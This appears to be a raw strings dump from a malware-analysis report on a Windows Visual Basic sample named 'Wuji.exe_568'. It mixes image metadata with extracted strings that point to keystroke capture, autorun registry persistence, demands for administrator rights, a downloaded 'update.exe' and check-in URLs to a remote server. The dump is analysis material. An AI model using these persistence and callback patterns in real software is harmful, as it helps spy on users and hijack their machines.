xmpMM:InstanceID="xmp.iid:ED16D5261EA511E3B21FD5142BC3ECF6" xmpMM:DocumentID="xmp.did:ED16D5271EA511E3B21FD5142BC3ECF6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ED16D5241EA511E3B21FD5142BC3ECF6" stRef:documentID="xmp.did:ED16D5251EA511E3B21FD5142BC3ECF6" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>8</pre><pre>.hH'"</pre><pre>'.dDji</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:998416A1B573E311B2FCE348ED0BFFDD" xmpMM:DocumentID="xmp.did:F2EFE278939111E3825F920E2590D74E" xmpMM:InstanceID="xmp.iid:F2EFE277939111E3825F920E2590D74E" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D52A66E69193E3118647F353FF5C7A7F" stRef:documentID="xmp.did:978416A1B573E311B2FCE348ED0BFFDD" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>3^</pre><pre>/%$]]](((</pre><pre>>-i7%DRG$</pre><pre>F1kL%U</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>gdi32.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shlwapi.dll</pre><pre>oleaut32.dll</pre><pre>iphlpapi.dll</pre><pre><requestedExecutionLevel level="requireAdministrator" 
uiAccess="false"></requestedExecutionLevel></pre><pre>accKeyboardShortcut</pre><pre>ekernel32.dll</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>6.0.1</pre><pre>{8856F961-340A-11D0-A96B-00C04FD705A2}</pre><pre>(*.*)</pre><pre>1.0.1</pre><pre>SprotLive.exe</pre><b>Wuji.exe_568:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>MSVBVM60.DLL</pre><pre>.Play78QQForm</pre><pre>.Play78QQButton</pre><pre>SHDocVwCtl.WebBrowser</pre><pre>#vb6chs.dll</pre><pre>shdocvw.dll</pre><pre>WebBrowser</pre><pre>D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB</pre><pre>H:\WINDOWS\system32\shdocvw.oca</pre><pre>GetAsyncKeyState</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>DeleteUrlCacheEntryA</pre><pre>user32.dll</pre><pre>Wuji.ime</pre><pre>advapi32.dll</pre><pre>RegCreateKeyA</pre><pre>RegCloseKey</pre><pre>GetProcessHeap</pre><pre>kernel32.dll</pre><pre>H:\WINDOWS\system32\MSVBVM60.DLL\3</pre><pre>COMDLG32.DLL</pre><pre>FH:\WINDOWS\system32\stdole2.tlb</pre><pre>VBA6.DLL</pre><pre>Keys</pre><pre>.kJC_a\</pre><pre>I|.....4444445555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555.zI</pre><pre>Ey ....11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111.......yE</pre><pre>All (*.*)| *.*</pre><pre>New_Key</pre><pre>http:///</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>http://www.miaoxia123.com</pre><pre>\Wuji.dat</pre><pre>Wuji.dat</pre><pre>\Show.dat</pre><pre>Show.dat</pre><pre>http://www.mi</pre><pre>a123.net/</pre><pre>gmts:\\.\ro</pre><pre>st.ex</pre><pre>install.php?login=</pre><pre>Email:ggxzabcc@163.com 
http://www.miaoxia123.com</pre><pre>*.TXT</pre><pre>|*.txt</pre><pre>onlinefirst.php?user=</pre><pre>\update.exe</pre><pre>WindowState</pre><pre>.commonDialog</pre><pre>.VBError</pre><pre>Windows 95 OSR2</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 2000 Data center</pre><pre>Windows 2000 Advanced</pre><pre>Windows 2000</pre><pre>Windows Vista</pre><pre>Windows XP Professional</pre><pre>Windows XP Home</pre><pre>Windows XP</pre><pre>Windows Server 2003 Enterprise</pre><pre>Windows Server 2003 Data center</pre><pre>Windows Server 2003 Web Edition</pre><pre>Windows Server 2003 Standard</pre><pre>Windows Server 2003</pre><pre>Web Server Edition</pre><pre>Windows Vista Server 2008</pre><pre>Windows 7</pre><pre>6.2.9200</pre><pre>Windows 8</pre><pre>Windows 8.1</pre><pre>5.0.2195</pre><pre>Windows 2000</pre><pre>Windows</pre><pre>5.2.3790</pre><pre>Windows Other</pre><pre>000000000000</pre><pre>http://</pre><pre>online.php?user=</pre></pre></n%></pre></pre></pre></k></pre></pre></pre></L></pre></pre></pre></K></pre></pre></K></pre></K></pre></x%x></pre></e></pre></S>